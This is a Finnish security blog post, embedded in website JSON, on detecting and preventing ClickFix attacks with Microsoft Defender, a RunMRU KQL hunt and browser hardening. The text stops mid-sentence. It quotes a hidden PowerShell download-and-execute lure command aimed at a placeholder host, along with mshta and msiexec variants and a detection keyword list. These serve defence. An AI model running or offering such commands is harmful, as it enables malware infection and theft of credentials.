[{"data":1,"prerenderedAt":1664},["ShallowReactive",2],{"sc:header-data-fi":3,"sc:footer-data-fi":489,"post-fi--posts-2026-09-21-clickfix-prevent-detect-153089af333d97":519,"authors_data":1087,"content-fi-list-7b291c2dd91a4":1440,"authors_data:Fritz Zurhorst|Nadine Klein":1660},{"lang":4,"home":5,"navigation":17,"meta":479,"contact":485},"de",{"name":6,"folderSwitch":7,"imgLight":10,"img":11,"languages":12},"home",[8,9],"authors","blog","/logos/gk-Logo-sw.svg","/logos/gk-Logo-rgb.svg",{"fi":13},{"title":14,"url":15,"alt":16},"Etusivu","/fi","glueckkanja Logo",[18,127,231,316,395,402],{"name":19,"languages":20,"children":24},"workplace",{"fi":21},{"title":22,"description":23},"Workplace","Microsoft 365 -pohjaiset älykkäät, turvalliset ja joustavat työympäristöt, jotka yhdistävät nykyaikaiset teknologiat ja identiteettipalvelut.",[25,55,91],{"name":26,"languages":27,"children":30},"portfolio",{"fi":28},{"title":29},"Portfolio",[31,37,43,49],{"name":32,"languages":33},"managed-intune",{"fi":34},{"title":35,"url":36},"Managed Intune","/fi/entra-intune/managed-intune",{"name":38,"languages":39},"managed-entra",{"fi":40},{"title":41,"url":42},"Managed Entra","/fi/entra-intune/managed-entra",{"name":44,"languages":45},"managed-workplace",{"fi":46},{"title":47,"url":48},"Managed Workplace","/fi/workplace/managed-workplace",{"name":50,"languages":51},"consulting-services",{"fi":52},{"title":53,"url":54},"Consulting Services","/fi/workplace/consulting-services",{"name":56,"languages":57,"children":60},"microsoft-365-endpoint",{"fi":58},{"title":59},"Microsoft 365 Endpoint",[61,67,73,79,85],{"name":62,"languages":63},"microsoft-entra-suite",{"fi":64},{"title":65,"url":66},"Microsoft Entra Suite","/fi/workplace/microsoft-entra-suite",{"name":68,"languages":69},"microsoft-intune",{"fi":70},{"title":71,"url":72},"Microsoft Intune","/fi/workplace/microsoft-intune",{"name":74,"languages":75},"microsoft-windows",{"fi":76},{"title":77,"url":78},"Microsoft Windows","/fi/workplace/microsoft-windows",{"name":80,"languages":81},"windows-365-cloud-pc",{"fi":82},{"title":83,"url":84},"Windows 365 Cloud PC","/fi/workplace/windows365-cloud-pc",{"name":86,"languages":87},"cloud-workplace-foundation",{"fi":88},{"title":89,"url":90},"Cloud Workplace Foundation","/fi/workplace/cloud-workplace-foundation",{"name":92,"languages":93,"children":96},"microsoft-365-collaboration",{"fi":94},{"title":95},"Microsoft 365 Collaboration",[97,103,109,115,121],{"name":98,"languages":99},"microsoft-copilot",{"fi":100},{"title":101,"url":102},"Microsoft 365 Copilot","/fi/workplace/microsoft-365-copilot",{"name":104,"languages":105},"microsoft-teams",{"fi":106},{"title":107,"url":108},"Teams","/fi/workplace/microsoft-teams",{"name":110,"languages":111},"sharepoint-powerplatform",{"fi":112},{"title":113,"url":114},"SharePoint & Power Platform","/fi/workplace/sharepoint-power-platform",{"name":116,"languages":117},"exchange-online",{"fi":118},{"title":119,"url":120},"Exchange Online","/fi/workplace/exchange-online",{"name":122,"languages":123},"information-protection-compliance",{"fi":124},{"title":125,"url":126},"Information Protection & Compliance","/fi/workplace/information-protection-compliance",{"name":128,"languages":129,"children":133},"azure",{"fi":130},{"title":131,"description":132},"Azure","Vauhdita kasvua Azurella: leikkaa pilvikustannuksia, paranna tehokkuutta ja edistä innovaatioita IaaS:n ja PaaS:n avulla.",[134,151,181],{"name":135,"languages":136,"children":138},"azure-portfolio",{"fi":137},{"title":29},[139,145],{"name":140,"languages":141},"azure-managed-services",{"fi":142},{"title":143,"url":144},"Azure Managed Services","/fi/azure/azure-managed-services",{"name":146,"languages":147},"azure-consulting",{"fi":148},{"title":149,"url":150},"Azure Consulting","/fi/azure/azure-consulting",{"name":152,"languages":153,"children":156},"azure-scenarios",{"fi":154},{"title":155},"Skenaariot",[157,163,169,175],{"name":158,"languages":159},"plan-your-cloud",{"fi":160},{"title":161,"url":162},"Suunnittele pilvesi","/fi/azure/plan-your-cloud",{"name":164,"languages":165},"migrate-to-the-cloud",{"fi":166},{"title":167,"url":168},"Siirry pilveen","/fi/azure/migrate-to-the-cloud",{"name":170,"languages":171},"innovate-your-business",{"fi":172},{"title":173,"url":174},"Uudista liiketoimintasi","/fi/azure/innovate-your-business",{"name":176,"languages":177},"vmware-exit",{"fi":178},{"title":179,"url":180},"Mieti VMware-strategiasi uudelleen","/fi/azure/vmware-exit",{"name":182,"languages":183,"children":186},"azure-practices",{"fi":184},{"title":185},"Practices",[187,193,199,202,208,213,219,225],{"name":188,"languages":189},"azure-foundation",{"fi":190},{"title":191,"url":192},"Azure Foundation","/fi/azure/azure-foundation",{"name":194,"languages":195},"azure-ai-foundation",{"fi":196},{"title":197,"url":198},"Azure AI Foundation","/fi/azure/azure-ai-foundation",{"name":86,"languages":200},{"fi":201},{"title":89,"url":90},{"name":203,"languages":204},"azure-data-foundation",{"fi":205},{"title":206,"url":207},"Azure Data Foundation","/fi/azure/azure-data-foundation",{"name":188,"languages":209},{"fi":210},{"title":211,"url":212},"Azure Container Foundation","/fi/azure/azure-container-foundation",{"name":214,"languages":215},"dark-tenant",{"fi":216},{"title":217,"url":218},"Managed Dark Tenant","/fi/azure/managed-dark-tenant",{"name":220,"languages":221},"azure-cloud-adoption-framework",{"fi":222},{"title":223,"url":224},"Cloud Adoption Framework","/fi/azure/cloud-adoption-framework",{"name":226,"languages":227},"azure-cloud-competence-center",{"fi":228},{"title":229,"url":230},"Cloud Competence Center","/fi/azure/cloud-competence-center",{"name":232,"languages":233,"children":242},"security",{"fi":234},{"title":235,"description":236,"emergency":237},"Tietoturva","Valppautta pilvessä palkitulla 24/7-hallintapalvelulla, häiriötilanteiden hallinnalla ja huippuluokan suojauksella infrastruktuurillesi.",{"text":238,"href":239,"skin":240,"icon":241},"Hyökkäyksen kohteena?","/fi/security/are-you-under-attack","primary","emergency",[243,268,289],{"name":244,"children":245},"security-security-consulting",[246,252,256,262],{"name":247,"languages":248},"managed-red-tenant",{"fi":249},{"title":250,"url":251},"Managed Red Tenant","/fi/security/managed-red-tenant",{"name":214,"languages":253},{"fi":254},{"title":255,"url":218},"Dark Tenant",{"name":257,"languages":258},"sentinel-data-lake",{"fi":259},{"title":260,"url":261},"Sentinel Data Lake","/fi/security/sentinel-data-lake",{"name":263,"languages":264},"security-consulting",{"fi":265},{"title":266,"url":267},"Security Consulting","/fi/security/security-consulting",{"name":269,"children":270},"security-cloud-security-operations-center",[271,277,283],{"name":272,"languages":273},"cloud-security-operations-center",{"fi":274},{"title":275,"url":276},"Cloud Security Operations Center","/fi/security/cloud-security-operations-center",{"name":278,"languages":279},"global-secure-access",{"fi":280},{"title":281,"url":282},"Global Secure Access","/fi/security/global-secure-access",{"name":284,"languages":285},"my-work-id",{"fi":286},{"title":287,"url":288},"MyWorkID","/fi/security/my-work-id",{"name":290,"children":291},"security-preventive-services",[292,298,304,310],{"name":293,"languages":294},"preventive-services",{"fi":295},{"title":296,"url":297},"Preventive Services","/fi/security/preventive-services",{"name":299,"languages":300},"data-security-services",{"fi":301},{"title":302,"url":303},"Data Security Service","/fi/security/data-security-service",{"name":305,"languages":306},"security-copilot-agents",{"fi":307},{"title":308,"url":309},"Security Copilot Agents","/fi/security/security-copilot-agents",{"name":311,"languages":312},"nis2",{"fi":313},{"title":314,"url":315},"NIS2:n käyttöönotto","/fi/security/red-dark-tenant-nis2",{"name":317,"languages":318,"children":322},"products",{"fi":319},{"title":320,"description":321},"Tuotteet","Innovatiiviset täydentävät tuotteet täysin turvalliseen, 100-prosenttisesti pilvipohjaiseen Microsoft-ympäristöön, jotka parantavat yhteistyötä, verkon todennusta ja ohjelmistojen hallintaa.",[323,360],{"name":324,"products":325,"children":326},"lorem ipsum 1",true,[327,336,344,352],{"name":328,"img":329,"target":330,"languages":331},"realmjoin","products/realmjoin/realmjoin-nav-logo.svg","_blank",{"fi":332},{"title":333,"url":334,"subtitle":335},"RealmJoin","https://www.realmjoin.com","Pilvipohjainen ohjelmistojen jakelu",{"name":337,"img":338,"target":330,"languages":339},"scepman","products/scepman/scepman-nav-logo.svg",{"fi":340},{"title":341,"url":342,"subtitle":343},"SCEPman","https://www.scepman.com","Varmenteiden jakelu pilvestä",{"name":345,"img":346,"target":330,"languages":347},"konnekt","products/konnekt/konnekt-nav-logo.svg",{"fi":348},{"title":349,"url":350,"subtitle":351},"KONNEKT","https://www.konnekt.io","Työskentele paikallisten Office 365 -tietojesi kanssa",{"name":353,"img":354,"target":330,"languages":355},"realmigrator","products/realmigrator/realmigrator-nav-logo.svg",{"fi":356},{"title":357,"url":358,"subtitle":359},"RealMigrator","https://www.realmigrator.com","Siirrä tietosi palvelimelta toiselle",{"name":361,"products":325,"children":362},"lorem ipsum 2",[363,371,379,387],{"name":364,"img":365,"target":330,"languages":366},"terraprovider","products/terraprovider/terraprovider-nav-logo.svg",{"fi":367},{"title":368,"url":369,"subtitle":370},"TerraProvider","https://www.terraprovider.com","Terraform Provider Microsoft 365:lle",{"name":372,"img":373,"target":330,"languages":374},"radiusaas","products/radius/radius-nav-logo.svg",{"fi":375},{"title":376,"url":377,"subtitle":378},"RADIUSaaS","https://www.radius-as-a-service.com","Todennus verkollesi",{"name":380,"img":381,"target":330,"languages":382},"unifiedcontacts","products/unified-contacts/unifiedcontact-nav-logo.svg",{"fi":383},{"title":384,"url":385,"subtitle":386},"Unified Contacts","https://www.unified-contacts.com","Etsi yhteystietoja Microsoft Teamsista",{"name":388,"img":389,"target":330,"languages":390},"autopilotmonitor","products/autopilot-monitor/AutopilotMonitor-nav-logo.svg",{"fi":391},{"title":392,"url":393,"subtitle":394},"Autopilot Monitor","https://www.autopilotmonitor.com","Windows Autopilot -valvonta reaaliajassa",{"name":396,"languages":397},"casestudies",{"fi":398},{"title":399,"url":400,"description":401},"Asiakastarinat","/fi/casestudies","Pilven edelläkävijä: paras Microsoft-kumppanisi kattaviin pilviratkaisuihin Blueprint-pohjaisella lähestymistavalla ja Infrastructure-as-Code-osaamisella.",{"name":403,"languages":404,"children":407},"company",{"fi":405},{"title":406,"description":401},"Yritys",[408,438,462],{"name":409,"languages":410,"children":413},"company-about-us",{"fi":411},{"title":412},"Tietoa meistä",[414,420,426,432],{"name":415,"languages":416},"company-facts-figures",{"fi":417},{"title":418,"url":419},"Faktat ja luvut","/fi/company/facts-and-figures",{"name":421,"languages":422},"company-contact",{"fi":423},{"title":424,"url":425},"Yhteystiedot ja toimipisteet","/fi/company/contact-and-locations",{"name":427,"languages":428},"switzerland",{"fi":429},{"title":430,"url":431},"glueckkanja Sveitsi","/fi/company/switzerland",{"name":433,"languages":434},"austria",{"fi":435},{"title":436,"url":437},"glueckkanja Itävalta","/fi/company/austria",{"name":439,"languages":440,"children":443},"company-career",{"fi":441},{"title":442},"Ura",[444,450,456],{"name":445,"languages":446},"company-career-overview",{"fi":447},{"title":448,"url":449},"Urakatsaus","/fi/career",{"name":451,"languages":452},"company-young-professionals",{"fi":453},{"title":454,"url":455},"Young Professionals","/fi/young-professionals",{"name":457,"languages":458},"company-jobs",{"fi":459},{"title":460,"url":461},"Avoimet työpaikat","/fi/job-offers",{"name":463,"languages":464,"children":467},"company-latest",{"fi":465},{"title":466},"Uusimmat",[468,474],{"name":469,"languages":470},"company-blog",{"fi":471},{"title":472,"url":473},"Blogi","/fi/blog",{"name":469,"languages":475},{"fi":476},{"title":477,"url":478},"Tapahtumat","/fi/events",[480],{"name":481,"languages":482},"career-meta",{"fi":483},{"title":442,"url":449,"active":484},false,{"languages":486},{"fi":487},{"title":488,"url":425,"active":484},"Yhteystiedot",{"data":490},{"bgColor":491,"number":492,"mail":493,"brandLogos":494,"logos":495,"links":499,"linksFi":509},"var(--color-gk-mid-blue)","+49 69 4005520","info@glueckkanja.com",null,[496],{"img":10,"alt":16,"url":497,"class":498},"index.html","max-w-19rem",[500,503,506],{"title":501,"url":502},"Datenschutz","/de/privacy",{"title":504,"url":505},"Impressum","/de/imprint",{"title":507,"url":508},"No Cookies","/de/cookies",[510,513,516],{"title":511,"url":512},"Tietosuoja","/fi/privacy",{"title":514,"url":515},"Oikeudelliset tiedot","/fi/imprint",{"title":517,"url":518},"Ei evästeitä","/fi/cookies",{"id":520,"title":521,"author":522,"body":525,"cta":494,"description":577,"eventid":494,"extension":1038,"hideInRecent":484,"layout":1039,"meta":1040,"moment":1044,"navigation":325,"path":1079,"seo":1080,"stem":1081,"tags":1082,"webcast":484,"__hash__":1086},"content_fi/posts/2026-09-21-clickfix-prevent-detect.md","ClickFix. Kun käyttäjä on se exploit, ja miten te pysäytätte sen",[523,524],"Fritz Zurhorst","Nadine Klein",{"type":526,"value":527,"toc":1027},"minimal",[528,533,537,540,547,555,558,564,567,587,598,604,610,613,617,619,622,625,629,631,634,648,652,654,661,741,758,761,765,767,770,785,788,791,795,797,800,803,828,832,834,837,844,848,850,853,879,882,885,888,987,990,993,996,1007,1010,1014,1016,1023],[529,530,532],"h2",{"id":531},"clickfix-hyökkäysketju","ClickFix-hyökkäysketju",[534,535,536],"p",{},"{: .h3-font-size}",[534,538,539],{},"ClickFix on hyökkäys, jossa käyttäjistä tulee omia hyökkääjiään. Ei exploitia, ei haavoittuvuutta. Uhri suorittaa haittakoodin itse, yhdellä ainoalla copy-pastella.",[534,541,542],{},[543,544],"img",{"alt":545,"src":546},"ClickFix-hyökkäysketju viidessä vaiheessa: houkutin, temppu, copy-paste, suoritus, infektio.","https://res.cloudinary.com/c4a8/image/upload/blog/pics/click-fix-img-01.png",[534,548,549,550,554],{},"Houkutin on social engineering: väärennetty CAPTCHA haitallisella sivulla, valheellinen tuki-ilmoitus (”selaimesi tarvitsee päivityksen”), phishing-viesti tai väärennetty kokoussivu. Sillä aikaa kun uhri on sivulla, JavaScript kirjoittaa payloadin leikepöydälle ",[551,552,553],"code",{},"clipboard.writeText()","-kutsulla. Sitten sivu kehottaa käyttäjää painamaan Win+R, Ctrl+V ja Enter. Suorita-dialogi käynnistää sen, mikä leikepöydällä on.",[534,556,557],{},"Tyypillinen houkutin näyttää tältä:",[534,559,560],{},[543,561],{"alt":562,"src":563},"Kuvakaappaus väärennetystä CAPTCHA-houkuttimesta, joka kehottaa käyttäjää painamaan Win ja X, sitten liittämään ja suorittamaan komennon Enterillä.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-02.png",[534,565,566],{},"Komento, jonka se asettaa leikepöydälle, näyttää tältä:",[568,569,571],"div",{"style":570},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[572,573,578],"pre",{"className":574,"code":575,"language":576,"meta":577,"style":577},"language-powershell shiki shiki-themes github-light github-dark","powershell.exe -w h iex(irm 'https://malicious[.]tld/payload' -UseBasicParsing)\n","powershell","",[551,579,580],{"__ignoreMap":577},[581,582,585],"span",{"class":583,"line":584},"line",1,[581,586,575],{},[534,588,589,590,593,594,597],{},"Kaksi asiaa tapahtuu samanaikaisesti. PowerShell käynnistyy piilotetussa ikkunassa (",[551,591,592],{},"-w h","), ja ",[551,595,596],{},"iex(irm …)"," lataa payloadin ja suorittaa sen suoraan muistissa. Mitään ei päädy levylle, joten signatuuripohjaisella virustorjunnalla ei ole mitään skannattavaa. Toinen vaihe on useimmiten infostealer (Lumma, Vidar, RedLine, StealC), Remote Access Trojan tai ransomware-loader.",[534,599,600,601,603],{},"Sama kuvio Microsoft Defenderin telemetriassa, piilotettu PowerShell käynnistettynä Windows Terminalista, joka suorittaa ",[551,602,596],{},":",[534,605,606],{},[543,607],{"alt":608,"src":609},"Microsoft Defenderin Inspect-record, jossa prosessiketju WindowsTerminal.exe, pwsh.exe ja powershell.exe suorittaa iex(irm …) -komennon.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-03.png",[534,611,612],{},"Miksi tämä toimii niin hyvin: kaikki ajaa käyttäjän kontekstissa, ilman korotettuja oikeuksia. Evästeet, tallennetut salasanat ja istuntotokenit ovat peruskäyttäjän ulottuvilla. Hyökkääjän ei tarvitse eskaloida oikeuksia päästäkseen siihen, minkä perässä hän tuli.",[529,614,616],{"id":615},"mitä-microsoft-defender-havaitsee","Mitä Microsoft Defender havaitsee",[534,618,536],{},[534,620,621],{},"Microsoft on viime kuukausina investoinut paljon ClickFix-tunnistukseen. Jos teidän Defenderinne on terve ja oikein konfiguroitu, saatte natiivit tunnistukset ClickFix-payloadeille. Q2 2025 lähtien MDE julkaisee käyttäytymispohjaisia alerteja otsikoilla kuten ”Suspicious 'ClickFix' behavior detected”, ”Malicious PowerShell command executed via Run dialog” tai ”An active 'Pacalau' malware in a command line was prevented from executing”. Ne laukeavat MDE:n cloud-enginestä prosessiketjun analyysin kautta, rinnakkain AV-tunnistuksen kanssa ja usein pari sekuntia aiemmin.",[534,623,624],{},"Konfiguraatio, joka tekee tämän mahdolliseksi, on kuvattu alempana suorituksen kovennuksen kohdalla.",[529,626,628],{"id":627},"missä-natiivi-tunnistus-tulee-rajoilleen","Missä natiivi tunnistus tulee rajoilleen",[534,630,536],{},[534,632,633],{},"Cloud-pohjaiset ML-signatuurit tarvitsevat aikaa ennen kuin ne laukeavat. Näemme säännöllisesti yli minuutin mittaisen aukon PowerShellin käynnistymisen ja Defender-alertin välillä. Nopeampi payload livahtaa tästä ikkunasta läpi.",[534,635,636,637,639,640,643,644,647],{},"Hyökkääjät myös sopeutuvat nopeasti. Vaihda ",[551,638,576],{}," tilalle ",[551,641,642],{},"mshta http://..."," tai ",[551,645,646],{},"msiexec /i http://...",", molemmat klassisia LOLBineja, niin PowerShell-kohtaiset tunnistukset eivät enää pure.",[529,649,651],{"id":650},"aukon-sulkeminen-runmru-hunt","Aukon sulkeminen: RunMRU-hunt",[534,653,536],{},[534,655,656,657,660],{},"Tämän aukon suljemme Custom Detectioneilla. Lähtökohtana on KQL-kysely rekisteriavaimeen ",[551,658,659],{},"RunMRU",", joka kirjaa jokaisen komennon, jonka käyttäjä kirjoittaa Win+R-dialogiin.",[568,662,663],{"style":570},[572,664,668],{"className":665,"code":666,"language":667,"meta":577,"style":577},"language-kusto shiki shiki-themes github-light github-dark","DeviceRegistryEvents\n| where ActionType =~ \"RegistryValueSet\"\n| where InitiatingProcessFileName =~ \"explorer.exe\"\n| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n| where RegistryValueData has \" ✅ \"\n    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n","kusto",[551,669,670,675,681,687,693,699,705,711,717,723,729,735],{"__ignoreMap":577},[581,671,672],{"class":583,"line":584},[581,673,674],{},"DeviceRegistryEvents\n",[581,676,678],{"class":583,"line":677},2,[581,679,680],{},"| where ActionType =~ \"RegistryValueSet\"\n",[581,682,684],{"class":583,"line":683},3,[581,685,686],{},"| where InitiatingProcessFileName =~ \"explorer.exe\"\n",[581,688,690],{"class":583,"line":689},4,[581,691,692],{},"| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n",[581,694,696],{"class":583,"line":695},5,[581,697,698],{},"| where RegistryValueData has \" ✅ \"\n",[581,700,702],{"class":583,"line":701},6,[581,703,704],{},"    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n",[581,706,708],{"class":583,"line":707},7,[581,709,710],{},"        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n",[581,712,714],{"class":583,"line":713},8,[581,715,716],{},"    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n",[581,718,720],{"class":583,"line":719},9,[581,721,722],{},"    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n",[581,724,726],{"class":583,"line":725},10,[581,727,728],{},"    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n",[581,730,732],{"class":583,"line":731},11,[581,733,734],{},"        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n",[581,736,738],{"class":583,"line":737},12,[581,739,740],{},"            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n",[534,742,743,744,747,748,747,751,747,754,757],{},"Kysely merkitsee jokaisen Win+R-merkinnän, joka näyttää ClickFix-komennolta: PowerShell, mshta, curl tai msiexec yhdessä tyypillisten indikaattorien kuten ",[551,745,746],{},"-w hidden",", ",[551,749,750],{},"iex",[551,752,753],{},"irm",[551,755,756],{},"DownloadString"," tai Base64-koodattujen payloadien kanssa. Se nappaa myös hienovaraiset temput. Vihreän check-emojin, jonka moni väärennetty CAPTCHA-houkutin asettaa komennon eteen. Unicode-merkit kyrillisiltä, arabialaisilta tai thaimaalaisilta alueilta, joilla hyökkääjät naamioivat tekstiä ja kiertävät yksinkertaisia merkkijonosuodattimia. Jos jokin näistä kuvioista ilmestyy Win+R-merkintään, käynnissä on hyvin todennäköisesti ClickFix-hyökkäys.",[534,759,760],{},"CSOC-asiakkaillemme ajamme näitä ja muita Custom Detectioneja sulkeaksemme aukon uusien hyökkäystekniikoiden ja sisäänrakennetun tunnistuksen välillä.",[529,762,764],{"id":763},"suojauslayer-1-toimituksen-estäminen","Suojauslayer 1: toimituksen estäminen",[534,766,536],{},[534,768,769],{},"Nyt preventioon. ClickFix on yleinen ja menestyksekäs, joten yksittäinen suojaus ei riitä. Työskentelemme layereissa, toimituksesta suoritukseen.",[534,771,772,773,776,777,780,781,784],{},"Network Protection estää tunnetut delivery-domainit ja C2-palvelimet kaikilta selaimilta. MDE Web Content Filtering täydentää kategorioilla kuten ”Newly registered domains”, ”Hacking” ja ”Illegal Software”. Network Protection on sisäänrakennettu Windowsiin, mutta kolmannen osapuolen selaimia varten teidän täytyy poistaa QUIC ja ECH käytöstä, koska molemmat salaavat koko yhteyden ja piilottavat kohdedomainin. Poistakaa QUIC käytöstä Chromessa ja Firefoxissa enterprise-policyllä (",[551,774,775],{},"QuicAllowed = Disabled"," Chromessa, ",[551,778,779],{},"network.http.http3.enable = false"," Firefoxissa); ECH:ta varten asetatte Chromessa ",[551,782,783],{},"EncryptedClientHelloEnabled = Disabled",".",[534,786,787],{},"Edgeä varten aktivoitte SmartScreenin. Kolmannen osapuolen selaimissa kytkette päälle niiden sisäänrakennetun Safe Browsingin. Se ei ole sama asia kuin Network Protection, mutta auttaa haitallisten sivujen suodattamisessa. Sähköpostivektorin osalta Safe Links ja Safe Attachments tarkistavat linkit ja liitteet, ennen kuin käyttäjät ovat niiden kanssa tekemisissä.",[534,789,790],{},"Koukku on tässä: kaikki tämä puree vain tunnettuun infrastruktuuriin. Ajankohtaiset ClickFix-kampanjat kulkevat tuoreeltaan rekisteröidyn infrastruktuurin kautta, joka identifioidaan ja estetään liian myöhään, ja joskus legitiimien sivujen kautta, jotka hyökkääjä on kompromentoinut. Katsotaan siis, mikä suojaa sen jälkeen kun houkutin on toimitettu.",[529,792,794],{"id":793},"suojauslayer-2-tempun-estäminen","Suojauslayer 2: tempun estäminen",[534,796,536],{},[534,798,799],{},"Pari Edgen ominaisuutta nostaa kynnystä sillä aikaa kun käyttäjä on haitallisella sivulla. Selainlaajennusten hallinta estää käyttäjiä asentamasta haitallisia tai kompromentoituja laajennuksia, jotka istuttavat ClickFix-overlayta tai manipuloivat itse leikepöytää. Edge Enhanced Security Mode asettaa tiukemmat suojatoimet tuntemattomille ja harvoin vierailluille sivuille (JIT pois käytöstä, Control Flow Guard, laitteistotuettu pinosuojaus), mikä vaikeuttaa exploitpohjaisia selainvaltauksia selvästi. Typo Protection varoittaa typosquatatuista domaineista (micros0ft.com, paypa1.com) ja estää yleisen ClickFix-toimitusvektorin väärennettyjen brändidomainien kautta.",[534,801,802],{},"Tekniset kontrollit ovat vain puoli voittoa. Käyttäjien valistus pysyy ratkaisevana. Se yksi sääntö, joka kantaa suurimman osan: jos verkkosivu kehottaa sinua liittämään jotain koneeseesi, kyseessä on hyökkäys. Tehkää siitä konkreettista awareness-koulutuksessa:",[804,805,807,808,807,816,807,822],"ul",{"style":806},"margin: 0.25rem 0","\n  ",[809,810,811,815],"li",{},[812,813,814],"strong",{},"Näyttäkää oikeita houkuttimia:"," väärennettyjä ”Verify you are human” -valintaruutuja, ”selaimesi tarvitsee päivityksen”, ”dokumenttia ei voitu renderöidä, suorita tämä korjaus”, rikkinäisiä Teams- tai Zoom-audiokehotteita.",[809,817,818,821],{},[812,819,820],{},"Esittäkää leikepöytätemppu:"," näyttäkää, miten sivu ylikirjoittaa leikepöydän hiljaa.",[809,823,824,827],{},[812,825,826],{},"Tehkää ilmoittamisesta helppoa:"," nopeasti ja ilman syyttelyä.",[529,829,831],{"id":830},"suojauslayer-3-toiminnon-estäminen","Suojauslayer 3: toiminnon estäminen",[534,833,536],{},[534,835,836],{},"Tässä on pari tapaa koventaa järjestelmää, eikä yksikään niistä ole takuu. Aloittakaa Suorita-dialogin poistamisesta käytöstä, se poistaa Win+R-sisääntulopisteen. Microsoftin ClickFix-ohjeistus suosittelee sen poistamista käytöstä ”where it isn't necessary”. Se sulkee nimenomaisen Win+R-liitoshyökkäyksen, mutta vaihtoehtoiset käynnistyspinnat jäävät, esimerkiksi Explorerin osoiterivi ja Windows Terminal.",[534,838,839,840,843],{},"Voitte lisäksi koventaa Edgeä ",[551,841,842],{},"DefaultClipboardSetting","-asetuksella, joka estää JavaScriptiä kirjoittamasta leikepöydälle hiljaa.",[529,845,847],{"id":846},"suojauslayer-4-suorituksen-estäminen","Suojauslayer 4: suorituksen estäminen",[534,849,536],{},[534,851,852],{},"Ennen edistyneitä ominaisuuksia laittakaa perusasiat kuntoon. ClickFixin osalta se tarkoittaa:",[804,854,807,855,807,861,807,867,807,873],{"style":806},[809,856,857,860],{},[812,858,859],{},"Local Admin Reduction:"," poistakaa paikalliset administrator-oikeudet loppukäyttäjiltä siellä missä mahdollista, jotta koodin suorituksen vaikutus rajautuu.",[809,862,863,866],{},[812,864,865],{},"Endpoint Privilege Management (EPM):"," antakaa käyttäjien työskennellä peruskäyttäjinä ja korottakaa vain hyväksytyt sovellukset policy-sääntöjen kautta.",[809,868,869,872],{},[812,870,871],{},"UAC-kovennus:"," tarkistakaa Secure Desktop -enforcement, kehotteiden käyttäytyminen administratoreille ja peruskäyttäjille sekä asennusohjelmien tunnistus.",[809,874,875,878],{},[812,876,877],{},"Credential Guard:"," eristäkää NTLM-hashit, Kerberos-tiketit ja muu credential-materiaali virtualisointipohjaisella turvallisuudella, jotta credential-varkaus pysyy vaikeana silloinkin, kun hyökkääjä saa admin-oikeudet.",[534,880,881],{},"Nämä kontrollit vähentävät eskalaatiomahdollisuuksia, suojaavat credentialeja ja pakottavat least privilege -periaatteen. Raja tulee tässä: ne rajaavat sitä, mitä kompromentoinnin jälkeen tapahtuu. Ne eivät estä infostealeria peruskäyttäjän kontekstissa lukemasta käyttäjälle luettavissa olevia evästeitä, istuntotokeneita ja sovellusten credential-storeja.",[534,883,884],{},"Sitten Microsoft Defender. Defender AV voi tunnistaa toisen vaiheen payloadin, mutta vain oikeilla asetuksilla: kytkekää Cloud Protection päälle ja asettakaa suojaustaso arvoon High tai High+. AMSI, Antimalware Scan Interface, antaa sovellusten luovuttaa sisältöä ajonaikaisesti Defenderille 